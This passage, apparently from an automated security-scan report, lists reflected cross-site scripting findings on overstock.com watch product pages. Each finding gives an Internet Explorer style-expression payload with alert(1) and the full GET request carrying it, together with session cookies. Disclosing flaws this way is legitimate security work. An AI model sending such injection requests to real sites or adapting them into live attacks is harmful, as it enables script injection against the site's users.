GET /Jewelry-Watches/Dufonte-by-Lucien-Piccard-Two-tone-Crystal-Watch/1856866/product.html?3c871"style%3d"x%3aexpression(alert(1))"32de36c4cac=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.420. http://www.overstock.com/Jewelry-Watches/Fossil-ES2444-Womens-Stella-White-Glitz-Chrono-Watch/5074818/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee826"style%3d"x%3aexpression(alert(1))"2d80b8ad4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee826"style="x:expression(alert(1))"2d80b8ad4a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Fossil-ES2444-Womens-Stella-White-Glitz-Chrono-Watch/5074818/product.html?ee826"style%3d"x%3aexpression(alert(1))"2d80b8ad4a3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.421. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Cubic-Zirconia-Accented-Silicone-Watch/4814479/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dee87"style%3d"x%3aexpression(alert(1))"949849df551 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dee87"style="x:expression(alert(1))"949849df551 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Platinum-Cubic-Zirconia-Accented-Silicone-Watch/4814479/product.html?dee87"style%3d"x%3aexpression(alert(1))"949849df551=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.422. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Mens-Dual-face-Genuine-Leather-Watch/4034798/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fb9"style%3d"x%3aexpression(alert(1))"cb13d708f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8fb9"style="x:expression(alert(1))"cb13d708f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Platinum-Mens-Dual-face-Genuine-Leather-Watch/4034798/product.html?b8fb9"style%3d"x%3aexpression(alert(1))"cb13d708f5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.423. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Polished-Swirl-Cuff-Watch/2925811/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1693a"style%3d"x%3aexpression(alert(1))"e4ae5ba49f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1693a"style="x:expression(alert(1))"e4ae5ba49f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Platinum-Polished-Swirl-Cuff-Watch/2925811/product.html?1693a"style%3d"x%3aexpression(alert(1))"e4ae5ba49f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.424. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Womens-Cubic-Zirconia-Accented-Silicone-Watch/4814916/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d1c"style%3d"x%3aexpression(alert(1))"af0e4f8fbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8d1c"style="x:expression(alert(1))"af0e4f8fbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Platinum-Womens-Cubic-Zirconia-Accented-Silicone-Watch/4814916/product.html?d8d1c"style%3d"x%3aexpression(alert(1))"af0e4f8fbd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.425. http://www.overstock.com/Jewelry-Watches/Geneva-Platinum-Womens-Rhinestone-Watch/2326288/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47b0f"style%3d"x%3aexpression(alert(1))"752b85419bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47b0f"style="x:expression(alert(1))"752b85419bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Platinum-Womens-Rhinestone-Watch/2326288/product.html?47b0f"style%3d"x%3aexpression(alert(1))"752b85419bd=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.426. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-CZ-Accent-Silicon-Link-style-Watch/4400944/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2359f"style%3d"x%3aexpression(alert(1))"bff2cf695f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2359f"style="x:expression(alert(1))"bff2cf695f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Womens-CZ-Accent-Silicon-Link-style-Watch/4400944/product.html?2359f"style%3d"x%3aexpression(alert(1))"bff2cf695f0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.427. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-CZ-Accent-Watch/4274322/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66c58"style%3d"x%3aexpression(alert(1))"53979d34bed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66c58"style="x:expression(alert(1))"53979d34bed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Womens-Platinum-CZ-Accent-Watch/4274322/product.html?66c58"style%3d"x%3aexpression(alert(1))"53979d34bed=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.428. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777296/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfc3e"style%3d"x%3aexpression(alert(1))"17d21e00aef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfc3e"style="x:expression(alert(1))"17d21e00aef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777296/product.html?bfc3e"style%3d"x%3aexpression(alert(1))"17d21e00aef=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.429. http://www.overstock.com/Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777298/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad493"style%3d"x%3aexpression(alert(1))"8186843d8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad493"style="x:expression(alert(1))"8186843d8a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Geneva-Womens-Platinum-Cubic-Zirconia-Accent-Watch/4777298/product.html?ad493"style%3d"x%3aexpression(alert(1))"8186843d8a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.430. http://www.overstock.com/Jewelry-Watches/Invicta-II-Mens-Stainless-Steel-Silver-Dial-Chronograph-Watch/4413284/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d024"style%3d"x%3aexpression(alert(1))"9fa523d2b12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d024"style="x:expression(alert(1))"9fa523d2b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Invicta-II-Mens-Stainless-Steel-Silver-Dial-Chronograph-Watch/4413284/product.html?2d024"style%3d"x%3aexpression(alert(1))"9fa523d2b12=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.431. http://www.overstock.com/Jewelry-Watches/Invicta-Mens-Invicta-II-Blue-Dial-Stainless-Steel-Watch/4354450/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fa95"style%3d"x%3aexpression(alert(1))"ff11bf3d577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fa95"style="x:expression(alert(1))"ff11bf3d577 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Invicta-Mens-Invicta-II-Blue-Dial-Stainless-Steel-Watch/4354450/product.html?2fa95"style%3d"x%3aexpression(alert(1))"ff11bf3d577=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.432. http://www.overstock.com/Jewelry-Watches/Invicta-Mens-Swiss-Quartz-Steel-Watch/1729425/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7334"style%3d"x%3aexpression(alert(1))"2eb69d4238 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7334"style="x:expression(alert(1))"2eb69d4238 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Jewelry-Watches/Invicta-Mens-Swiss-Quartz-Steel-Watch/1729425/product.html?c7334"style%3d"x%3aexpression(alert(1))"2eb69d4238=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.433. http://www.overstock.com/Jewelry-Watches/Invicta-Pro-Diver-Mens-Automatic-Steel-Watch/1891965/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 244e1"style%3d"x%3aexpression(alert(1))"5a84823bf1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 244e1"style="x:expression(alert(1))"5a84823bf1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
